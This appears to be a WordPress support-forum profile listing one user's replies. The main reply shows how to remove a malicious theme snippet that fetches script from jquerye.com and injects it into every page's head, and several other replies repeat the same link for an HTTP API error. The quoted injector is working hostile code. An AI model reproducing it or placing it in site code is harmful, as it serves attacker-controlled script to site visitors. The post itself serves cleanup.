Abdullah Alhourani
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: www.jquerye.com/jquery-1.6.3.min.js (port 80) errorI have solution.
Go to your cpanel –> File Manager –> wp-content –> themes –> “YOUR THEME ” –>includes –> postformats –> post.php
Find this code:
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>And delete all this code and past this:
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){return '';}add_action('wp_head', 'insert_jquery_slider');} ?>And Save
Or open your theme and search on current directory option the post.php
and fix it.
if you need help contact me [contact information removed – please provide any and all help here]Forum: Fixing WordPress
In reply to: Automatically RedirectingThank you but I’m scan my website it’s safe, this is a result of http://sitecheck.sucuri.net/scanner
but it’s not solved.
🙁Forum: Plugins
In reply to: Profile subdomain for usersthank you very much.
Forum: Plugins
In reply to: Profile subdomain for usershow can i do this, any tutorial.
Forum: Plugins
In reply to: Profile subdomain for usersNo I want everyone to have a profile sub-domain, and contains his information and ex. designs works.
follow this link to learn how to fixed this error
http://www.cornerofart.com/2011/10/14/wordpress-an-unexpected-http-error-occurred-during-the-api-request/Forum: Fixing WordPress
In reply to: An Unexpected HTTP Error occurred during the API request.follow this link to learn how to fixed this error
http://www.cornerofart.com/2011/10/14/wordpress-an-unexpected-http-error-occurred-during-the-api-request/Forum: Fixing WordPress
In reply to: An Unexpected HTTP Error occurred during the API request.Forum: Fixing WordPress
In reply to: An Unexpected HTTP Error occurred during the API requestfollow this link to learn how to fixed this error
http://www.cornerofart.com/2011/10/14/wordpress-an-unexpected-http-error-occurred-during-the-api-request/Forum: Fixing WordPress
In reply to: An Unexpected HTTP Error occurred during the API request – IMPORTANTForum: Fixing WordPress
In reply to: An Unexpected HTTP Error occurred during the API request.Forum: Fixing WordPress
In reply to: "An Unexpected HTTP Error occurred during the API request."Hello, I’m fixed this error go to here to learn
http://www.cornerofart.com/2011/10/14/wordpress-an-unexpected-http-error-occurred-during-the-api-requestForum: Fixing WordPress
In reply to: An Unexpected HTTP Error occurred during the API request.I’m fixed this error here : http://www.cornerofart.com/2011/10/14/wordpress-an-unexpected-http-error-occurred-during-the-api-request/
Forum: Fixing WordPress
In reply to: An Unexpected HTTP Error occurred during the API request.I’m fixed it now 🙂 go to this link yo learn
http://www.cornerofart.com/2011/10/14/wordpress-an-unexpected-http-error-occurred-during-the-api-request/